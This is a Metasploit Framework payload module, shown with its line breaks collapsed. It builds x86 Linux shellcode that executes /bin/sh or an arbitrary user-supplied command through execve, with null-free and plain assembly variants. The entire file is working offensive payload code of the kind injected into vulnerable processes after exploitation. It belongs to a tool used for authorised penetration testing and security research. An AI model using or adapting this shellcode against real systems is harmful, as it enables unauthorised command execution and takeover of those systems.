## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## ### # # Exec # ---- # # Executes an arbitrary command. # ### module MetasploitModule CachedSize = 43 include Msf::Payload::Single include Msf::Payload::Linux def initialize(info = {}) super(merge_info(info, 'Name' => 'Linux Execute Command', 'Description' => 'Execute an arbitrary command or just a /bin/sh shell', 'Author' => ['vlad902', 'Geyslan G. Bem '], 'License' => MSF_LICENSE, 'References' => [ ['URL', 'https://github.com/geyslan/SLAE/blob/master/4th.assignment/tiny_execve_sh.asm'], ['URL', 'https://github.com/geyslan/SLAE/blob/master/improvements/x86_execve_dyn.asm'] ], 'Platform' => 'linux', 'Arch' => ARCH_X86 )) # Register exec options register_options( [ OptString.new('CMD', [ false, "The command string to execute" ]), ]) register_advanced_options( [ OptBool.new('NullFreeVersion', [ true, "Null-free shellcode version", false ]) ]) end def generate(opts={}) cmd = datastore['CMD'] || '' nullfreeversion = datastore['NullFreeVersion'] if cmd.empty? # # Builds the exec payload which executes a /bin/sh shell. # execve("/bin/sh", NULL, NULL) # if nullfreeversion # 21 bytes (null-free) payload = <<-EOS xor ecx, ecx ; ecx = NULL mul ecx ; eax and edx = NULL mov al, 0xb ; execve syscall push ecx ; string '\0' push 0x68732f2f ; "//sh" push 0x6e69622f ; "/bin" mov ebx, esp ; pointer to "/bin//sh\0" cmd int 0x80 ; bingo EOS else # 20 bytes (not null-free) payload = <<-EOS xor ecx, ecx ; ecx = NULL mul ecx ; eax and edx = NULL mov al, 0xb ; execve syscall push 0x0068732f ; "/sh\0" push 0x6e69622f ; "/bin" mov ebx, esp ; pointer to "/bin/sh\0" cmd int 0x80 ; bingo EOS end else # # Dynamically builds the exec payload based on the user's options. # execve("/bin/sh", ["/bin/sh", "-c", "CMD"], NULL) # pushw_c_opt = "dd 0x632d6866" # pushw 0x632d (metasm doesn't support pushw) if nullfreeversion if cmd.length > 0xffff raise RangeError, "CMD length has to be smaller than %d" % 0xffff, caller() end if cmd.length <= 0xff # 255 breg = "bl" else breg = "bx" if (cmd.length & 0xff) == 0 # let's avoid zeroed bytes cmd += " " end end mov_cmd_len_to_breg = "mov #{breg}, #{cmd.length}" # 47/49 bytes without cmd (null-free) payload = <<-EOS xor ebx, ebx mul ebx mov al, 0xb push edx #{pushw_c_opt} ; "-c" mov edi, esp jmp tocall ; jmp/call/pop cmd address afterjmp: pop esi ; pop cmd address into esi #{mov_cmd_len_to_breg} ; mov (byte/word) (bl/bx), cmd.length mov [esi+ebx], dl ; NUL '\0' terminate cmd push edx push 0x68732f2f ; "//sh" push 0x6e69622f ; "/bin" mov ebx, esp push edx push esi push edi push ebx mov ecx, esp int 0x80 tocall: call afterjmp ; call/pop cmd address db "#{cmd}" EOS else # 36 bytes without cmd (not null-free) payload = <<-EOS push 0xb pop eax cdq push edx #{pushw_c_opt} ; "-c" mov edi, esp push 0x0068732f ; "/sh\0" push 0x6e69622f ; "/bin" mov ebx, esp push edx call continue db "#{cmd}", 0x00 continue: push edi push ebx mov ecx, esp int 0x80 EOS end end Metasm::Shellcode.assemble(Metasm::Ia32.new, payload).encode_string end end